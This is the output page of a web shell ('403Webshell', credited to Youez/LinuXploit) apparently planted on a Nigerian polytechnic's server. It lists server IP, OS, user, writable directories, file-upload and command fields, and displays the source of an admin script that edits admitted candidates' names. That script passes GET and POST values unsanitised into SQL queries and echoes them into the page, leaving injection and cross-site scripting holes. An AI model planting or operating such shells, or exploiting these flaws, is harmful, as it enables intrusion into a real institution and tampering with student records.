403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.131.126
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_main/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/admin_main/ace_changeName_process.php
<?php

include('ace_headMain.php');
?>
<table width="100%" cellspacing="5" cellpadding="3">
          <tr>
            <td align="center"><!-- InstanceBeginEditable name="EditRegion3" -->
      <?php
		 if (isset($_SESSION['sName'] )){
			echo 'The Admin user Editing is: '.$_SESSION['sName'];
			echo'<br />';
			require_once('../connect.php');
			if(isset($_GET['form'])){
			$change = $_GET['form'];
			$sql = "SELECT * FROM ace_admitted WHERE formNo='$change'";
			$result = $db->query($sql);
			$num = $result->rowCount();
                $result_fetch=$result->fetch(PDO::FETCH_BOTH);
				if ($num=1){
					echo '<p style="font-weight:bold">'.$result_fetch['names'].'</p>';
					echo '<p style="font-weight:bold">TYPE THE CORRECT NAMES BELOW:  </p>';
				?>
					<form action="ace_changeName_process.php?ch_name=<?php echo $result_fetch['names']?>" method="post">
						<input type="text" name="new_name" required="required" id="txtRound" size="200" value="<?php echo $result_fetch['names'];?>"/>
						<input type="submit" name="button" id="button" value="Change"/>
				      <input type="hidden" name="hFormNo" id="hFormNo" value="<?php echo $change ;?>" />
					</form>
				<?php }
			}
			if(isset($_GET['ch_name'])){
				$formNo= $_POST['hFormNo'];
                $names=$_POST['new_name'];
                $names=str_replace("'","''",$names);
				$oldnames=$_GET['ch_name'];
				echo 'The Names of the Candidate '.$oldnames.' has been changed to : ';
				$sqla = "UPDATE ace_admitted SET names = '$names' WHERE formNo = '$formNo'";
				$resulta = $db->query($sqla);
				$sqlb = "UPDATE ace_realdata SET names = '$names' WHERE formNo = '$formNo'";
				//echo $formNo;
				$resultb = $db->query($sqlb);
				echo $names;
				echo '<br />
				<a href="ace_nameUpdate.php">Back...</a>';
			}
		}else{
			echo 'Un-Authorized Access....';
			
		}

	  ?>

		<br />
<a href="logout.php">Log Out </a>
<!-- InstanceEndEditable --></td>
            </tr>
        </table></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
    </table></td>
  </tr>
</table>
<p>&nbsp;</p>
<script type="text/javascript">
var MenuBar1 = new Spry.Widget.MenuBar("MenuBar1", {imgDown:"../SpryAssets/SpryMenuBarDownHover.gif", imgRight:"../SpryAssets/SpryMenuBarRightHover.gif"});
</script>
</body>
<!-- InstanceEnd --></html>

Youez - 2016 - github.com/yon3zu
LinuXploit